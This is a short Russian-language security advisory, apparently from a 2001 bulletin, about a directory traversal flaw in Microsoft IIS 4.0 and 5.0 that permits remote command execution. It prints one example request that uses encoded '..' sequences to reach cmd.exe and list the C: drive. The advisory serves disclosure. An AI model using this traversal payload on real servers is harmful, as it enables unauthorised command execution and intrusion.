Security Lab

Обратный путь и удаленное выполнение команд в MS IIS 4.0,5.0

Дата публикации:21.09.2001
Дата изменения:17.10.2006
Всего просмотров:1254
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Microsoft Internet Information Server уязвим к обратному просмотру директорий, что позволяет атакующему выполнять удаленно команды на сервере.

Пример:

http://target/Scripts/..%u0025u005c..u0025u005cWINNT/system32/cmd.exe?/c+dir+c:


Уязвимость найдена нашим хакером ALife // BERG(buginfo@inbox.ru) и была послана в BUGTRAQ (3348).



Никакой информации от Microsoft не поступало, так же неизвестно, закрывают ли эту уязвимость предыдущие патчи.